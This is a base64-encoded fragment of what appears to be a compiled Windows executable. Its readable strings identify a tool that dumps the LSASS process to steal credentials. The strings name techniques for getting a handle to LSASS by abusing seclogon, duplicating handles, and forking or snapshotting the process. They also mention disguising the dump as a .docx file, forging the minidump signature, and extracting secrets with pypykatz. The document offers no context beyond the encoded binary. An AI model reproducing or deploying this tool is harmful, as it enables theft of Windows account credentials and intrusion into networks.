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aRS4AbABzAGEAcwByAHYALgBkAGwAbAAAAG0AcwB2ADEAXwAwAC4AZABsAGwAAAB0AHMAcABrAGcALgBkAGwAbAAAAHcAZABpAGcAZQBzAHQALgBkAGwAbAAAAGsAZQByAGIAZQByAG8AcwAuAGQAbABsAAAAbABpAHYAZQBzAHMAcAAuAGQAbABsAAAAZABwAGEAcABpAHMAcgB2AC4AZABsAGwAAABrAGQAYwBzAHYAYwAuAGQAbABsAAAAYwByAHkAcAB0AGQAbABsAC4AZABsAGwAAABsAHMAYQBkAGIALgBkAGwAbAAAAHMAYQBtAHMAcgB2AC4AZABsAGwAAAByAHMAYQBlAG4AaAAuAGQAbABsAAAAbgBjAHIAeQBwAHQALgBkAGwAbAAAAG4AYwByAHkAcAB0AHAAcgBvAHYALgBkAGwAbAAAAGUAdgBlAG4AdABsAG8AZwAuAGQAbABsAAAAdwBlAHYAdABzAHYAYwAuAGQAbABsAAAAdABlAHIAbQBzAHIAdgAuAGQAbABsAAAAYwBsAG8AdQBkAGEAcAAuAGQAbABsAAAAAAAAAAAAAAAAAHVzYWdlOiAlcyBbLS1nZXRwaWRdIC0td3JpdGUgQzpcV2luZG93c1xUZW1wXGRvYy5kb2N4IFstLXZhbGlkXSBbLS1mb3JrXSBbLS1zbmFwc2hvdF0gWy0tZHVwXSBbLS1tYWxzZWNsb2dvbl0gWy0tYmluYXJ5IEM6XFdpbmRvd3Ncbm90ZXBhZC5leGVdIFstLWhlbHBdAAoAICAgIC0tZ2V0cGlkACAgICAgICAgICAgIHByaW50IHRoZSBQSUQgb2YgTFNBU1MgYW5kIGxlYXZlAAAAACAgICAtLXdyaXRlIERVTVBfUEFUSCwgLXcgRFVNUF9QQVRIAAAAAAAgICAgICAgICAgICBmaWxlbmFtZSBvZiB0aGUgZHVtcAAgICAgLS12YWxpZCwgLXYAAAAAAAAAACAgICAgICAgICAgIGNyZWF0ZSBhIGR1bXAgd2l0aCBhIHZhbGlkIHNpZ25hdHVyZQAgICAgLS1mb3JrLCAtZgAgICAgICAgICAgICBmb3JrIHRoZSB0YXJnZXQgcHJvY2VzcyBiZWZvcmUgZHVtcGluZwAgICAgLS1zbmFwc2hvdCwgLXMAAAAgICAgICAgICAgICBzbmFwc2hvdCB0aGUgdGFyZ2V0IHByb2Nlc3MgYmVmb3JlIGR1bXBpbmcAICAgIC0tZHVwLCAtZAAAAAAgICAgICAgICAgICBkdXBsaWNhdGUgYW4gZXhpc3RpbmcgTFNBU1MgaGFuZGxlACAgICAtLW1hbHNlY2xvZ29uLCAtbQAAAAAgICAgICAgICAgICBvYnRhaW4gYSBoYW5kbGUgdG8gTFNBU1MgYnkgKGFiKXVzaW5nIHNlY2xvZ29uAAAAAAAAICAgIC0tYmluYXJ5IEJJTl9QQVRILCAtYiBCSU5fUEFUSAAAAAAAACAgICAgICAgICAgIGZ1bGwgcGF0aCB0byB0aGUgZGVjb3kgYmluYXJ5IHVzZWQgd2l0aCAtLWR1cCBhbmQgLS1tYWxzZWNsb2dvbgAgICAgLS1oZWxwLCAtaAAAAAAAACAgICAgICAgICAgIHByaW50IHRoaXMgaGVscCBtZXNzYWdlIGFuZCBsZWF2ZQAtLWdldHBpZAAtdgAtLXZhbGlkAC13AC0td3JpdGUAbWlzc2luZyAtLXdyaXRlIHZhbHVlAC1wAC0tcGlkAG1pc3NpbmcgLS1waWQgdmFsdWUAMDEyMzQ1Njc4OQBJbnZhbGlkIFBJRDogJXMALWYALS1mb3JrAC1zAC0tc25hcHNob3QALWQALS1kdXAALW0ALS1tYWxzZWNsb2dvbgAtczIALS1zdGFnZTIALWIALS1iaW5hcnkAbWlzc2luZyAtLWJpbmFyeSB2YWx1ZQAAAABZb3UgbXVzdCBwcm92aWRlIGEgZnVsbCBwYXRoOiAlcwAAAAAAAAAAVGhlIGJpbmFyeSAiJXMiIGRvZXMgbm90IGV4aXN0cy4ALWgALS1oZWxwAGludmFsaWQgYXJndW1lbnQ6ICVzAElmIE1hbFNlY0xvZ29uIGlzIGJlaW5nIHVzZWQgbG9jYWxseSwgeW91IG5lZWQgdG8gcHJvdmlkZSB0aGUgZnVsbCBwYXRoOiAlcwAAAAAAVGhlIG9wdGlvbnMgLS1mb3JrIGFuZCAtLXNuYXBzaG90IGNhbm5vdCBiZSB1c2VkIGF0IHRoZSBzYW1lIHRpbWUATFNBU1MgUElEOiAlbGQAAAAAAAAAAFlvdSBtdXN0IHByb3ZpZGUgdGhlIGR1bXAgZmlsZTogLS13cml0ZSBDOlxXaW5kb3dzXFRlbXBcZG9jLmRvY3gAAAAAAAAAAElmIC0tZHVwIGFuZCAtLW1hbHNlY2xvZ29uIGFyZSB1c2VkLCB5b3UgbmVlZCB0byBwcm92aWRlIGEgYmluYXJ5IHdpdGggLS1iaW5hcnkAVGhlIG9wdGlvbiAtLWJpbmFyeSBjYW4gb25seSBiZSB1c2VkIHdpdGggLS1tYWxzZWNsb2dvbiBhbmQgLS1kdXAAAAAAAAAAAAAAAAAAAABQkQBAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAUABAAAACKABQAEAAADsbwFAAQAAADiQAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVbmtub3duIGVycm9yAAAAQXJndW1lbnQgZG9tYWluIGVycm9yIChET01BSU4pAABPdmVyZmxvdyByYW5nZSBlcnJvciAoT1ZFUkZMT1cpAFBhcnRpYWwgbG9zcyBvZiBzaWduaWZpY2FuY2UgKFBMT1NTKQAAAABUb3RhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoVExPU1MpAAAAAAAAVGhlIHJlc3VsdCBpcyB0b28gc21hbGwgdG8gYmUgcmVwcmVzZW50ZWQgKFVOREVSRkxPVykAQXJndW1lbnQgc2luZ3VsYXJpdHkgKFNJR04pAAAAAAAAAF9tYXRoZXJyKCk6ICVzIGluICVzKCVnLCAlZykgIChyZXR2YWw9JWcpCgAAeHT//yx0///Ec///THT//1x0//9sdP//PHT//01pbmd3LXc2NCBydW50aW1lIGZhaWx1cmU6CgAAAAAAQWRkcmVzcyAlcCBoYXMgbm8gaW1hZ2Utc2VjdGlvbgAgIFZpcnR1YWxRdWVyeSBmYWlsZWQgZm9yICVkIGJ5dGVzIGF0IGFkZHJlc3MgJXAAAAAAAAAAACAgVmlydHVhbFByb3RlY3QgZmFpbGVkIHdpdGggY29kZSAweCV4AAAgIFVua25vd24gcHNldWRvIHJlbG9jYXRpb24gcHJvdG9jb2wgdmVyc2lvbiAlZC4KAAAAAAAAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBiaXQgc2l6ZSAlZC4KAAAAAAAAACVkIGJpdCBwc2V1ZG8gcmVsb2NhdGlvbiBhdCAlcCBvdXQgb2YgcmFuZ2UsIHRhcmdldGluZyAlcCwgeWllbGRpbmcgdGhlIHZhbHVlICVwLgoAAAAAAACgef//oHn//6B5//+gef//oHn//wh5//+gef//0Hn//wh5//8zef//AAAAAAAAAAAobnVsbCkAACgAbgB1AGwAbAApAAAATmFOAEluZgAAAF6k//+Inf//iJ3//3ik//+Inf//gKP//4id//+Xo///iJ3//4id//8MpP//SKT//4id//+aof//s6H//4id///Pof//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//iJ3//+yh//+Inf//oKL//4id///Yov//EKP//0ij//+Inf//VaD//4id//+Inf//RaH//4id//+Inf//iJ3//4id//+Inf//iJ3//9uk//+Inf//iJ3//4id//+Inf//AJ7//4id//+Inf//iJ3//4id//+Inf//iJ3//4id//+Inf//gp///4id////nv//eJ7//32g///VoP//DaH//7Wg//94nv//YJ7//4id//9cof//fKH//0Sf//8Anv//FaD//4id//+Inf//057//2Ce//8Anv//iJ3//4id//8Anv//iJ3//2Ce//8AAAAASW5maW5pdHkATmFOADAAAAAAAAAAAPg/YUNvY6eH0j+zyGCLKIrGP/t5n1ATRNM/BPp9nRYtlDwyWkdVE0TTPwAAAAAAAPA/AAAAAAAAJEAAAAAAAAAIQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAADgPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAZAAAAfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8D8AAAAAAAAkQAAAAAAAAFlAAAAAAABAj0AAAAAAAIjDQAAAAAAAavhAAAAAAICELkEAAAAA0BJjQQAAAACE15dBAAAAAGXNzUEAAAAgX6ACQgAAAOh2SDdCAAAAopQabUIAAEDlnDCiQgAAkB7EvNZCAAA0JvVrDEMAgOA3ecNBQwCg2IVXNHZDAMhOZ23Bq0MAPZFg5FjhQ0CMtXgdrxVEUO/i1uQaS0SS1U0Gz/CARAAAAAAAAAAAvInYl7LSnDwzp6jVI/ZJOT2n9ET9D6UynZeMzwi6WyVDb6xkKAbICgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACA4Dd5w0FDF24FtbW4k0b1+T/pA084TTIdMPlId4JaPL9zf91PFXUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAFAAQAAAAAAAAAAAAAAQAABQAEAAAAAAAAAAAAAAOD3AEABAAAAAAAAAAAAAACQKwFAAQAAAAAAAAAAAAAAkCsBQAEAAAAAAAAAAAAAAOAcAUABAAAAAAAAAAAAAAAAA